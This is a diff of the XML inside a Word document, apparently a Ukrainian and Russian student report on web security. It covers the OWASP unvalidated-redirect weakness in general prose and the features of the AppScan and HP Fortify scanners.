+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>10. Неперевірені перенаправлення і переходи</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web-додатки часто перенаправляють користувачів на інші сторінки за допомогою певних параметрів. Якщо ці параметри не перевіряються, то зловмисник може обманним шляхом перенаправити користувача на шкідливу Web-сторінку, змусивши його розкрити свій пароль та інші важливі дані. Наприклад, зловмисник може створити повідомлення електронної пошти з фішинговою посиланням, що містить ім'я необхідного Web-сайту. При цьому відповідальний за перенаправлення параметр, що міститься в кінці URL-адреси, може бути не видно користувачеві, в результаті чого користувач з великою ймовірністю клацне за цим посиланням або скопіює її в Web-браузер, так як доменне ім'я в URL-адресі не викличе у нього ніяких підозр.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -25556,7 +26391,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Main features in Appscan:</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25569,6 +26404,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:t>Main features in Appscan:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
         <w:br/>
       </w:r>
     </w:p>
@@ -25584,6 +26432,18 @@
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -25620,7 +26480,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. </w:t>
       </w:r>
       <w:r>
@@ -25659,6 +26518,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Glass box testing: Glass box scanning is a new feature introduced in Appscan. This process installs an agent on the server which helps find hidden URLs and additional issues.</w:t>
       </w:r>
     </w:p>
@@ -26379,8 +27239,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve">Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
+        <w:t>предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31165,7 +32035,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{740880D6-EE86-4E82-AC72-5D9FA9414C9D}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{55F10CF0-A310-4ABB-9178-555DF61AC711}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>

<commit_message>
with owasp description + full life cycle v5
</commit_message>
<xml_diff>
--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -24752,6 +24752,7 @@
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24765,6 +24766,720 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>AppScan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Основні можливості </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>AppScan:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Підтримка </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Flash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> завдяки цьому він може тестувати додатки побудовані на базі </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Adobe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Flex</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Протокол </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>AMF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>також підтримується.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Тестування прозорого ящика: суть полягає у встановленні спеціального агенту, який допомагає </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">відшукати приховані </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>URl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-адреси та </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>інші дефекти.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>С</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>канування веб-служб: сканування веб-служби є однією з областей</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, необхідних організаціям для більш ефективної автоматизації.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Аналізатор безпеки </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Appscan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> дозволяє аналізувати </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>сторінки на предмет вразливостей, та допомагає користувачеві сфокусуватись на проблемах, зосереджених на клієнтській стороні.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Звітність: в</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>иходячи з ваших вимог, ви можете створювати звіти в бажаних форматах і включати потрібні поля в ньому.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Настроювані політики сканування: AppScan поставляється з набором певних політик сканування. Ви можете налаштувати політику відповідно до ваших потреб.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
